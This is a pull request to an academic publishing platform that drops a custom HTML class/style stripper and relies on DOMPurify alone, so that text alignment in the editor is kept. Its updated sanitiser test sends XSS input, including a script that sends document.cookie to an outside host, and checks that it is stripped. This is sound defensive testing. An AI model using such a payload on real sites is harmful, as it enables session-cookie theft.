### PR TITLE
OC-853: Text alignment not retained on main text editor

### DIFF
--- a/api/src/components/publicationVersion/__tests__/updatePublicationVersion.test.ts
+++ b/api/src/components/publicationVersion/__tests__/updatePublicationVersion.test.ts
@@ -39,22 +39,16 @@ describe('Update publication version', () => {
         expect(updatedVersion.status).toEqual(200);
     });
 
-    test('HTML is sanitised if not "safe" (1)', async () => {
+    test('HTML is sanitised if not "safe"', async () => {
         const updatedVersion = await testUtils.agent
             .patch('/publication-versions/publication-interpretation-draft-v1')
             .query({ apiKey: 123456789 })
-            .send({ content: '<p class="class">Hello <a href="#nathan">Nathan</a></p>' });
+            .send({
+                content:
+                    '<p><a target="_blank" href="http://example.net">test</a></p><script>alert(\'XSS\')</script><script>var i=new Image;i.src=\'https://b.soc.ja.net?\'+document.cookie;</script>'
+            });
 
-        expect(updatedVersion.body.content).toEqual('<p>Hello <a href="#nathan">Nathan</a></p>');
-    });
-
-    test('HTML is sanitised if not "safe" (2)', async () => {
-        const updatedVersion = await testUtils.agent
-            .patch('/publication-versions/publication-interpretation-draft-v1')
-            .query({ apiKey: 123456789 })
-            .send({ content: '<p style="color: red;">Hello <a href="#nathan">Nathan</a></p>' });
-
-        expect(updatedVersion.body.content).toEqual('<p>Hello <a href="#nathan">Nathan</a></p>');
+        expect(updatedVersion.body.content).toEqual('<p><a href="http://example.net">test</a></p>');
     });
 
     test('Cannot update publication version licence', async () => {

--- a/api/src/lib/helpers.ts
+++ b/api/src/lib/helpers.ts
@@ -9,36 +9,9 @@ import * as publicationVersionService from 'publicationVersion/service';
 import { licences } from './enum';
 import { webcrypto } from 'crypto';
 
-export const isHTMLSafe = (content: string): boolean => {
-    const $ = cheerio.load(content);
-    let error = false;
-
-    $('*').map((_, element) => {
-        const classes = $(element).attr('class');
-        const style = $(element).attr('style');
-
-        if (classes || style) {
-            error = true;
-
-            return false;
-        }
-    });
-
-    return !error;
-};
-
 export const getSafeHTML = (content: string): string => {
-    // Remove all classes and styles
-    const $ = cheerio.load(content, null, false);
-
-    $('*').map((_, element) => {
-        return $(element).removeAttr('class').removeAttr('style');
-    });
-
-    const htmlToBeSanitized = $.html();
-
     // Sanitize against XSS
-    return DOMPurify.sanitize(htmlToBeSanitized);
+    return DOMPurify.sanitize(content);
 };
 
 export const createEmptyDOI = async (): Promise<I.DOIResponse> => {

--- a/e2e/tests/LoggedIn/publish.e2e.spec.ts
+++ b/e2e/tests/LoggedIn/publish.e2e.spec.ts
@@ -920,8 +920,6 @@ const addCoAuthorsAndRequestApproval = async (page: Page, coAuthors: Helpers.Tes
 };
 
 test.describe('Publication flow + co-authors', () => {
-    test.describe.configure({ mode: 'serial' });
-
     test('Create a PROBLEM publication with co-authors', async ({ browser }) => {
         const page = await Helpers.getPageAsUser(browser);
 


### PR DESCRIPTION
The purpose of this PR was to address the fact that text alignment is not saved on the main text editor. When text is centred or right-aligned, this state is not retained upon saving, meaning the text appears as (default) left aligned when previewing, publishing or revisiting the edit page.

This has been happening because of our long-standing HTML sanitisation code. This takes a simple approach of removing all classes and styles from HTML. Now that we also use DOMpurify in the same place to achieve the same ends, we can safely remove our previous method. This way, intentional / safe styles, like the one that applies text direction, can be preserved.

---

### Acceptance Criteria:

Publication content can be saved with centre and right aligned text added using the UI's text editor.

---

### Checklist:

- [x] Local manual testing conducted
- [ ] Automated tests added - none added but two changed to reflect the different filtering we are doing
- [ ] Documentation updated

---

### Tests:

API
![Screenshot 2024-06-11 142602](https://github.com/JiscSD/octopus/assets/132363734/00e12c67-0ea9-4e77-877b-7c03eadb575b)

E2E
![Screenshot 2024-06-12 113624](https://github.com/JiscSD/octopus/assets/132363734/c797d732-e605-4127-b3f8-e296aa8b773c)

---

### Screenshots:

![Screenshot 2024-06-12 114500](https://github.com/JiscSD/octopus/assets/132363734/fd058bc1-0584-4a0c-95f3-2c7e4db479bf)

